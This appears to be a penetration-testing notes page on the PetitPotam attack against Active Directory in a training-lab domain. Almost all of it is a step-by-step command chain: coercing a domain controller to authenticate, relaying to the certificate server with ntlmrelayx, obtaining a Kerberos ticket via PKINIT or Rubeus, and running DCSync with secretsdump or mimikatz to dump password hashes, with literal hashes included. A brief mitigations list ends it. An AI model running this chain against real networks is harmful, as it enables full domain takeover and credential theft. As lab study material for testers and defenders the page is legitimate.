PetitPotam (MS-EFSRPC) (without authentication to the domain)

Start NTLM hash capture tool

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

METHOD1: Run petitpotam.py tool (In another terminal of linux)

python3 petitpotam.py <attack_host_ip> <DC_host_ip>

METHOD2: Run `mimikatz` tool (In another session of windows)

.\mimikatz.exe "Misc::efs /server:<DC_IP> /connect:<attack_host>" exit

METHOD3: Alternate of petitpotam.py (powershell implementation)

Invoke-Petitpotam.ps1

Capture Cache base64 encoded certificate for DC01

sudo ntlmrelayx.py -debug -smb2support --target [http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp](http://academy-ea-ca01.inlanefreight.local/certsrv/certfnsh.asp) --adcs --template DomainController

Requesting a TGT using gettgtpkinit.py

python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 <cache_base64_certificate> dc01.ccache

Setting up KRB5CCNAME environment variable

export KRB5CCNAME=dc01.ccache

Use DC TGT to DCSync (extract all the NTLM passwords)

secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

Check out TGT in memory

Klist

Confirm admin access to the DC

nxc smb 172.16.5.5 -u administrator -H 88ad09182de639ccc6579eb0849751cf

Request for NT hashes using TGT ticket

python /opt/PKINITtools/getnthash.py -key <TGT_key> INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

Perform DCSync attack using DC NTLM hash

secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba

Alternatively, once we obtain the base64 certificate via ntlmrelayx.py, we could use the certificate with the Rubeus tool on a Windows attack host to request a TGT ticket and perform a pass-the-ticket (PTT) attack all at once.

Requesting TGT and perform PTT (pass-the-ticket) with DC

.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:<certificate_no>  /ptt

Confirm the ticket in memory

Klist

Perform the DCSync attack with Mimikatz

.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\<username>" exit

PetitPotam mitigations

Apply patch for the vulnerability
To prevent NTLM relay attacks, enable Require SSL to only allow HTTPS connection.
Disable NTLM authentication for DC.
Disable NTLM on AD CS servers using Group Policy.
Disable NTLM for IIS on AD

PreviousExploiting Permission Delegation Nextprint-nightmare

Last updated 1 month ago

hashtagStart NTLM hash capture tool

hashtagMETHOD1: Run petitpotam.py tool (In another terminal of linux)

hashtagMETHOD2: Run mimikatz tool (In another session of windows)

hashtagMETHOD3: Alternate of petitpotam.py (powershell implementation)

hashtagCapture Cache base64 encoded certificate for DC01

hashtagRequesting a TGT using gettgtpkinit.py

hashtagSetting up KRB5CCNAME environment variable

hashtagUse DC TGT to DCSync (extract all the NTLM passwords)

hashtagCheck out TGT in memory

hashtagConfirm admin access to the DC

hashtagRequest for NT hashes using TGT ticket

hashtagPerform DCSync attack using DC NTLM hash

hashtagRequesting TGT and perform PTT (pass-the-ticket) with DC

hashtagPerform the DCSync attack with Mimikatz

hashtagPetitPotam mitigations